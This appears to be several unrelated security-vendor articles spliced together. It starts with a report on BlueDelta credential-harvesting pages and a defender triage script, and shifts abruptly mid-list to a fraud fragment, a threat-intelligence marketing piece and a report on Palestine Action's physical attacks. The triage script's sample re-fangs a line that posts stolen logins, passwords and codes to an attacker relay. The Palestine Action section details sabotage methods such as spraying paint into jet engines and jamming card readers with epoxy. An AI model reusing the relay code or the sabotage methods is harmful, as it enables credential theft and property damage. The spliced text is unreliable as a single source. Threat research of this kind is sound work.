BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.
Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.
Technical Analysis
On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in Figure 1. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.
Figure 1: The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)
The malicious UKR.NET page had very similar functionality to that previously observed by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to a fixed domain and high-port combination, kfghjerrlknsm[.]line[.]pm[:]11962, as shown in Figure 2.
Figure 2: UKR.NET credential capture page JavaScript (Source: Recorded Future)
The line[.]pm apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.
At the time of analysis, the domain resolved to the IP address 18[.]157[.]68[.]73, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.
The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure in early 2024.
BlueDelta added new functionality to the page hosted on kfghjerrlknsm[.]line[.]pm to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in Figure 3.
var respIP=$.getJSON('hxxps://httpbin[.]org/ip');
Figure 3: Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)
Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.
On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain 5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net.
The apex domain serveo[.]net is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.
In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain jkbfgkjdffghh[.]linkpc[.]net, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the linkpc[.]net domain resolved to suspected ngrok IP address 3[.]67[.]15[.]169.
Additionally, BlueDelta added new first-stage redirection domains for two of the pages: ukraine[.]html-5[.]me and ukrainesafe[.]is-great[.]org. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains html-5[.]me and is-great[.]org are owned by the free hosting company Byet Internet Services.
On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, jkbfgkjdffghh[.]linkpc[.]net:17461, as shown in Figures 4 and 5.
Figure 4: JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)
Figure 5: JavaScript code used to capture credentials (Source: Recorded Future)
During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in Figure 6, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.
Figure 6: PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages (Source: Recorded Future)
Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:
doads[.]org
in[.]run
t[.]ly
tiny[.]cc
tinyurl[.]com
linkcuts[.]com
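A defender-side triage helper written for this report as an added example (not Insikt Group's or Recorded Future's code): it tags a captured page's script and the links pulled from PDF lures with the infrastructure traits described above (Mocky and Byet free hosting, DNS EXIT dynamic DNS relays on fixed high ports, Serveo tunnels, the HTTPBin IP lookup, and the link shorteners listed). The sample page text and lure URLs are constructed; the indicator values are those quoted in the report, re-fanged for matching, while the port threshold, tag names and verdict rules are assumptions.

```python
import re
from urllib.parse import urlsplit

# Indicator sets taken from the report text above (re-fanged for matching).
DYNAMIC_DNS_APEX = {"line.pm", "linkpc.net"}          # DNS EXIT subdomains used as ngrok relays
TUNNEL_APEX = {"serveo.net"}                          # Serveo remote port forwarding
FREE_HOSTING_APEX = {"mocky.io", "html-5.me", "is-great.org"}  # Mocky pages, Byet redirectors
SHORTENER_APEX = {"doads.org", "in.run", "t.ly", "tiny.cc", "tinyurl.com", "linkcuts.com"}
IP_LOOKUP = "httpbin.org/ip"                          # victim IP capture call from Figure 3
HIGH_PORT_MIN = 10000                                 # assumed threshold; ports seen: 11962, 10176, 17461

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
HOST_PORT_RE = re.compile(r"\b([a-z0-9.-]+\.[a-z]{2,}):(\d{4,5})\b", re.I)


def apex(host: str) -> str:
    """Return the last two labels of a hostname (enough for the apex domains above)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_url(url: str) -> list:
    """Tag one URL with the infrastructure roles described in the report."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    a = apex(host)
    tags = []
    if a in SHORTENER_APEX:
        tags.append("link-shortener")
    if a in FREE_HOSTING_APEX:
        tags.append("free-hosting")
    if a in DYNAMIC_DNS_APEX:
        tags.append("dynamic-dns")
    if a in TUNNEL_APEX:
        tags.append("tunnel-provider")
    # A relay on a fixed high port only matters when the host is already suspicious.
    if parts.port and parts.port >= HIGH_PORT_MIN and tags:
        tags.append("fixed-high-port")
    if IP_LOOKUP in url.lower():
        tags.append("victim-ip-lookup")
    return tags


def scan_page(js_text: str) -> dict:
    """Map each suspicious endpoint in a captured page's HTML/JavaScript to its tags."""
    findings = {}
    for url in URL_RE.findall(js_text):
        tags = classify_url(url)
        if tags:
            findings[url] = tags
    # Bare 'host:port' strings outside full URLs (the relay URL may be assembled at runtime).
    rest = URL_RE.sub(" ", js_text)
    for host, port in HOST_PORT_RE.findall(rest):
        tags = classify_url(f"//{host}:{port}")
        if tags:
            findings[f"{host}:{port}"] = tags
    return findings


def triage(page_js: str, lure_urls: list) -> dict:
    """Combine page and lure-link findings into a verdict an analyst can act on."""
    page = scan_page(page_js)
    lures = {u: classify_url(u) for u in lure_urls if classify_url(u)}
    relay = any("fixed-high-port" in t for t in page.values())
    ip_lookup = any("victim-ip-lookup" in t for t in page.values())
    # Relay on a high port plus the IP lookup is the combination described above;
    # either one alone, or tagged lure links, still merits review.
    if relay and ip_lookup:
        verdict = "likely-credential-harvester"
    elif relay or ip_lookup or lures:
        verdict = "suspicious"
    else:
        verdict = "no-indicators"
    return {"verdict": verdict, "page": page, "lures": lures}


# Constructed sample resembling the traits in Figures 2 and 3 (not the real page).
SAMPLE_PAGE_JS = """
var respIP = $.getJSON('https://httpbin.org/ip');
var relay = 'kfghjerrlknsm.line.pm:11962';
$.post('https://' + relay + '/', {login: u, password: p, otp: code});
"""

# Constructed lure links: shapes named in the report plus one benign control.
SAMPLE_LURE_URLS = [
    "https://t.ly/EXAMPLE",                                           # shortener; path is a placeholder
    "https://ukraine.html-5.me/",                                     # Byet tier-two redirector
    "https://run.mocky.io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050",   # Mocky URL from the report
    "https://5ae39a1b39d45d08f947bdf0ee0452ae.serveo.net/",           # Serveo relay from the report
    "https://mail.ukr.net/",                                          # legitimate service, not tagged
]

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_PAGE_JS, SAMPLE_LURE_URLS), indent=2))
```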
In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:
Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.
Card testing signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning indicators that preceded the final malicious transaction.
Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.
The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.
The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.
This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.
Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.
Key Trends Driving Threat Intelligence Evolution
There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.
Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).
Challenges Holding Teams Back Today
Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.
Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.
These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.
Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned
In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).
Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.
Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.
Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.
Implications for 2026 Security Budgets and Investments
As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.
One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.
Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.
After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow… We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.
Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company
Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.
That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.
Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.
Charting the Course to 2026
Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.
By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.
So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.
With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.
Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.
Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.
Key Findings
Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.
Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.
The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.
The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.
In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.
Palestine Action: History and Terrorism Designation
Palestine Action was founded in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. Palestine Action’s core purpose is almost certainly to promote militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has focused its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.
Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) reported that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”
The frequency and scope of Palestine Action’s operations in the UK almost certainly increased following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. Figure 1 (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.
Figure 1: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)
The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, operation in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack caused over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper announced the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially designated a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for anyone convicted of being a Palestine Action member.
Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally challenge the ban and garner public support for its cause through a series of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.
However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (Figure 2) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”
Figure 2: Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)
Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its de facto moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.
Palestine Action’s Tactics, Techniques, Procedures, and Targets
Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.
Across the globe, the primary targets of Palestine Action and similar groups are almost certainly the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.
Direct Action TTPs
Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:
Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.
Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.
Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.
Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.
If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.
Vandalism
Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.
These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”
Figure 3: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)
Obstruction
Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group’s methods of obstructing facilities are very unlikely to be intended to keep the operation covert. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.
Figure 4: Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source: BBC)
Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.
Figure 5: Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)
Sabotage
Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.
The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group shows activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the aircraft’s engines and striking the aircraft with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly due to the impact of the attack on sensitive parts and equipment inside the aircraft’s engines. The attack on RAF Brize Norton led to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.
Figure 6: Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)
Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol breached an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation caused over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to label the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists accessed the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.
Targets
Palestine Action’s primary target in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has conducted notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also targeted other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.
As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.
Palestine Action’s Global Network
Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.
